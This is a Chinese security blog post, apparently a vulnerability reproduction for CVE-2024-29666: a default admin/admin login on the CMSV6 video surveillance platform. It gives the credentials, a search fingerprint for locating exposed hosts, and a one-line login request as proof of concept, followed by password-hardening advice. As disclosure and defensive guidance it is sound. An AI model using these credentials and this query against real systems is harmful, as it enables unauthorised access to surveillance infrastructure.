文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!
一:漏洞名称
通天星CMSV6 admin 弱口令漏洞
二:漏洞描述
CMSV6平台是一款功能强大的视频监控管理平台,能够实现多设备接入支持、远程实时监控、录像回放和存储管理、报警管理和处理、权限管理以及系统日志和报表记录等功能。适用于各种规模的监控系统,为用户提供全面的监控、管理和处理功能,帮助实现对监控系统的有效管理和运营。
该系统CMSV6 7.31.0.2、7.32.0.3版本中存在弱密码漏洞。用户名:admin 密码:admin
三:漏洞影响版本
CMSV6 7.31.0.2CMSV6 7.32.0.3
四:网络空间测绘查询
body="/808gps/"
五:漏洞复现
POC:
GET /StandardApiAction_login.action?account=admin&password=admin HTTP/1.1返回值中包含admin即为成功
弱口令漏洞是指系统或应用程序中存在使用简单、常见或容易猜测的密码,导致攻击者可以轻松地通过尝试常见密码或使用密码破解工具来获取对系统的非法访问权限。这种漏洞的原理在于用户或管理员设置的密码过于简单或容易猜测,使得攻击者有可能通过穷举或暴力破解方式获取登录凭证。防御措施:设置复杂密码:密码应该包括大小写字母、数字和特殊字符,并且长度足够长,以增加破解难度。定期更改密码:定期要求用户更改密码,以减少密码泄露后的风险。使用账户锁定机制:在一定次数的登录失败后锁定账户,防止暴力破解。强制密码策略:实施强制的密码复杂度和最小长度要求。
建议更新当前系统或软件至最新版,完成漏洞的修复。原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-29666
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论